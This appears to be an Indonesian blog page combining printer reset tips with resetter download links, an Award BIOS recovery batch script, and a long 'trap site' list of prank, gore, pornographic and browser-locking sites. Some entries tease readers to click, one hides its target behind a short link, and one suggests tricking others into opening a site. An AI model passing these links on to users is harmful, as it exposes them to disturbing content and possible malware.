* Double Click tombol Stop/Reset disini printer akan masuk service mode, dimana printer tidak akan berfungsi sebelum kita keluar dari service mode.
* Tunggu sejenak saat printer melakukan warming up, dan saat printer load, tekan tombol Stop/Reset empat kali dengan cepat.
* Setelah itu, keluar service mode dengan cara mematikan printer dan mencabut kabel daya printer dari socket daya.
* Printer kembali dapat digunakan setelah dipasang kabel daya kembali. Dan proses EPROM Reset selesai.

Tapi ingat, ini hanya proses reset secara software, untuk membuang tangki tinta buangan tetap harus membongkar printer, dan itu sebaiknya dilakukan oleh teknisi berpengalaman.



NB:


-RESETTER print EPSON, download aja di:
http://www.ziddu.com/download/2931829/epsonresetter.zip.html
-RESETTER print CANON :
software http://www.ziddu.com/download/2931904/Software_Resetter_Canon_IP.zip.html
resetter canon IP1900/1980 + petunjuk resetnya download aja di link berikut:
http://www.ziddu.com/download/2816581/PetunjukResetCanoniP1900.doc.html
lanjutkan dengan software berikut:
http://www.ziddu.com/download/2816619/Software_Resetter_CanoniP1900.zip.html
-RESETTER print CANON type MP download aja di:
http://www.ziddu.com/download/2862699/MPtool145150160170180450460.zip.html
PETUNJUK RESET print CANON MP Class download di:
http://www.ziddu.com/download/2862717/CaraPakairesetterMPtool.txt.html

Recovery BIOS (AWARD BIOS ONLY...!!!!...)

                                                             AWARD BIOS ONLY

(Basic Input Operating Sistem) yang terdapat di setiap mainboard komputer tidak selamanya akan stabil. penyebab utama BIOS korupt ato rusak adalah virus dan flash up date BIOS yang gagal. pada umumnya jika BIOS telah rusak ato korupt, maka yang dilakukan adalah dengan mengganti mainboard yang baru. namun sebenarnya ada cara yang bisa ditempuh untuk mengembalikan BIOS kedalam kondisi semula. (posting ini hanya untuk awards BIOS!!!!).
yang harus di perhatikan dalam recovery bios adalah:
  1. komputer harus terdapat floopy disk drive
  2. file BIOS backup/ file BIOS update yang fresh
  3. awards flash sesuai dengan versi BIOS mainboard
  4. autoexec.bat
  5. semua di copy ke dalam disket bootable
isi dari DISKET yang akan digunakan untuk recoveri BIOS awdflash.exe, newbios.bin, autoexec.bat and system files (msdos.sys, io.sys and command.com).

create autoexec.bat file on the floppy:
@echo off
if exist oldbios.bin goto old
awdflash.exe newbios.bin oldbios.bin /py /sy /cc /cp /cd /sb /r
goto end
:old
awdflash.exe oldbios.bin /py /sn /cc /cp /cd /sb /r
:end


nyala'in komputer, masukan disket kedalam floopy drive. karena monitor tidak menunjukkan adanya tanda bahwa reflashing BIOS sedang berlangsung, maka indikasinya adalah dengan bunyi beep dari speaker PC, perhatikan dengan seksama. bunyi pertama adalah terdeteksinya floopy, kedua proses reflashing, ketika proses flash telah berhasil. maka dengan sendirinya komputer akan restart. segera cabut disket dari tempatnya. ato kalo tidak dicabut maka proses reflashing akan terulang lagi.

Selasa, 12 Juli 2011

JEBAKAN BAT-MAN.....hehehe....

HANYA UNTUK MEMBERI TAHU


1. http://killerjo.net/
pasti dah pada tau ini situs apa.. neh situs paling terkenal.. suaranya itu lho...

2. http://gandhi.isgreat.org/
situs ini menyeramkan bikin kaget orang bahkan lebih parah dari killerjo.. penasaran klik dong..!!

3. http://urangsunda.50webs.com/Noclick.html
situs ini mengajak anda untuk berolahraga jari telunjuk karena anda harus trus2an mengklik sampai habis dan tidak bisa di close

4. http://www.1227.com/
Situs ini mengajak anda untuk berkaraoke tapi dengan cara yang tidak biasa karena menggunakan javascript yang lain. Satu hal yang pasti anda tidak akan bisa keluar atau menutup tab pada browser sebelum anda menyelesaikan liriknya chekidot

5. http://www.d1gdo.com/admin/

6. http://d1gdo.com/images
katanya bikin mozillanya jadi muter2

7. http://subang.co.tv/
Untuk situs ini anda diharuskan untuk mengaktifkan Flash Player pada browser anda, karena filenya berupa flash lalu dengar dan lihat apa yang terjadi. ini cuma saudara killerjo gambarnya pun gambar kilerjo

8. http://esc-creation.com/scream
isinya menakutkan…

9. http://sukatoro.com/
neh web paling menjijikkan.. masa orang lagi pup diliatin dimakan lagi tuh pupnya astaga

10. http://www.kenapa-ini.blogspot.com/
sesuai judul webnya bikin orang nyebut ‘kenapa ini’

11. http://nobrain.dk/
katanya isinya ad orang lagi maho.. $R@#%#^$%?????

12. http://www.themobiletracker.com/
Jika anda ingin melacak keberadaan seseorang dengan nomor Hpnya disinilah tempatnya, tampilan situs ini cukup resmi, namun pepatah juga mengatakan”jangan hanya melihat buku dari sampulnya, tapi juga isinya” begitu juga dengan situs ini. Pertamanya emang cukup meyakinkan, tapi selanjutnya…??

13. http://members.home.nl/saen/Special/Zoeken.swf
Ini adalah sebuah kuis dimana anda harus mencari perbedaan dari dua buah gambar, tapi ada kejutan diakhirnya

14. http://www.boi.netai.net/
klo gk slah neh situs yg bsa buat browser kyak “hang”, kta tmn gw sih firefox bsa “lari-lari” & pndh-pndh..

15. http://www.hotel626.com/
maennya kita disuruh nginep di hotel yg penuh setan,ubah time di komputer lo jadi 6:00 pm karena sesuai dgn namanya 6 to 6 jadi dari jam 6 malam ke 6 pagi

16. http://wwwwwwwww.jodi.org/
dilihat dari URLnya saja sudah aneh banget ya gak?? wwwwwwwww. ada hurup W 9 kali disana.. haaaa
terus yang jika anda page source, akan muncul teka-teki gambar yang lumayan aneh. seperti gambar mesin namun apa maksut dari gambar itu gw gak paham
dan jangan salah jika anda klick layar pada gambar akan muncul suatu link yang sulit dipahami, silahkan anda coba sendiri

17. http://404.jodi.org/ae/
nah kalau website yang ini sama sech sebetulnya namun berbeda dengan yang tadi kalau tadi hurup w 9 kali kalai ini malah 404, seperti kode eror saja pikir saya heeeee [Gambar: 14.gif]
dan jika di page source malah blank tak ada apa-apa. hu_uh tak tau lah website apa ini..
web site yang satu ini ada Link yang terletak pada gambar hewan seperti kambing yang meghubungkankan suatu link. dan link itu juga perlu pemahaman sendiri. heeeeeeee

18. http://rotten.com/
web paling mengenaskan sekaligus sara jadi itu web kayak orang mati dilindes Tank, orang mati ditembak shotgun dari deket, ada yang mati dimakan binatang, ada bayi dipotong-potong ama ibunya (Vidio), Wartawan Pers di Irak dipenggal kepalanya, diliatin smua… Penasaran coba ajah

20. http://www.asylum626.com/
mirip kyk hotel 626 tp lebih SERU yg ini, asik tuh. jam mainnya juga kayak Hotel 626

21. http://truth.mcdonalds-revealed.com/
jgn diklik…,ada virusnya+jadi SPAM truss di FB….

22. http://www.joyangeles.com/
web ini hampir mirip kayak sukatoro..

23. http://www.fragskin.com
ati2 gan,, isinya gambar maho n gak isa dimatiin jg…

24. http://www.joyangeles.com/
web ini hampir mirip kayak sukatoro..

25. http://www.googlehammer.com
jgn dibuka lho isinya maho ==” tapi bisa ditutup, yg liat bisa mati mendadak wkkwkwkwkwkkwkw

26. http://www.moldy*men.com/
web yang katanya bikin orang frustasi.. mending langsung liat aj ke TKP

27. http://goobel.50webs.com
BTW tuh isinya sedikit mirip no click dan google gerak” .. tapi nanti suara teria subang adaa di setiap click .. padahal NO SOUND .

28. http://www.fadebook.com/
di suruh olah raga jari tuh klo g slh soalnya pernah di post sih webnya

29. http://www.salahkamar.com/
jngn nyesel, kalo gak pngen nyesel mangkanya suruh orang lain aja buat jadi tumbalnya, ane belom pernah sih tapi kata temen ane isinya campuran kalo dah di klik gak bisa di close atau restart bahkan di shutdown
kalo cara close nya mudah tinggal matiin aja langsung dari sekeringnya selesai deh
tapi bener loh kata temen ane gan isinya itu campuran gan ada orang maho @#$%$@%%& terus ada
gambar hantunya ada orang di bunuh serem pokoknya terus mozila nya jadi kecil besar sendiri

30. http://www.rumdesign.com/wrong/
fokus ke ke jendela tunggu 1 menit dan lihat kejutannya..!!

31. http://www.kiwil-curhat.page.tl/Jangan-Di-Klik.htm
cuma web olahraga jari hampir sama kyk urangsunda cuma suruh klik2an aj terus2an ampe selesai bagi yg gak sabaran restart aj kompinya…

32. http://www.luna-maya.com/
ternyata dikaskus banyak orang yg dikerjain suruh buka situs ini emang situs ini ngagetin klo mau matiin suara kompi

33. http://www.geryadrian.com/
ini cuma web sponsor kok gpp, gak berbahaya & menyeramkan, gak percaya? klik aj

New update:

34. http://www.youtube.com/666
coba refresh ampe 10 X atau lebih dan liat hasilnya weeee…
entar youtubenya berubah jadi merah darah gitu…. dan langsung buffering video sendiri….
kita mesti nonton video itu kagak bisa di close atau di tutub tabnya….
untuk penjelasan youtube 666...


35. http://piepra.talk4fun.net
baru saja w menemukan situs yg jahil abis, w dah nyoba masuk …dan ini memang hanya untuk lucu2an.
Situs ini tdk berbahaya…hanya permainan javascript ada yg berani coba…silakan

36. http://bit.ly/4ZibPJ
w barusan dikirimin teman dikasih link yang lucu sich. Kalo mau lihat silahkan klik aja. Ya responku sih agak kaget juga. Tapi karena dah sering liat itu jadi terbiasa dech… xixixixixi

37. http://nopic-hoax.blogspot.com/
boleh dapet dari kaskus tapi w gak tau isi webnya biasanya situs ini sering disembunyikan dgn hyperlink

38. http://www.youtube.com/watch?v=Shnu__NJ5Wo
oh ya waktu pertama kali ngeliat web ini.. menurut w ini web paling menyeramkan dari web2 lainnya bukan gambar seram dan situs jail atau virus melainkan video terlarang di youtube yg katanya klo nonton bisa mebuat anda menyongkel mata sendiri ini bisa terjadi apabila anda konsen fokus kevideonya.. w sendiri dah pernah nonton bareng2 ama tmn sewarnet.. suasana ini sangat berbeda dibandingkan suasana waktu nonton sendiri jadi w saranin klo mo nonton video ini rame2 aj ajak sekitar 10 orang gak usah fokus ke videonya ngobrol2 biasa aj.. dijamin anda gak bakal takut.. dah

39. http://sajjadali.com/
tu ntar ada nyanyian
trus lama2 nyanyiannya berubah jd serem gitu credits: makmur

40. http://www.youjizz.com/
nih paling asoy yang pernah ada !!!
dijamin klo liat pasti pingsan !!!
kaoakoakao…

41. http://www.facebook.com/notifications.ph…5824165682
video mengejutkan di fb.. penasaran? lihat dan saksikan!

42. http://www.outube.com/
hati2 buat agan2 klo mo buka youtube malah salah ketik yg kebuka justru…

43. http://www.sinthaistudio.com/thehouse2/
gw dikasih situs dari temen isinya apa yah silahkan buka gw kg berani tapi katanya berbahaya

44. http://www.oranggila.com/
yg ini ada yg baru gan jngn di klik dah nanti ikut gila gannya oke

45. http://www.bokre.com
jngn di klik gan kalo gak pengen nyesel ntar

46. http://www.porkspin.com

47. http://www.meatspin.com

48. http://bluewaffle.com

49. http://2girls1cup.com

50. http://gigihweb.co.cc



aDA YANG MAU NAMBAHIN..????????????????????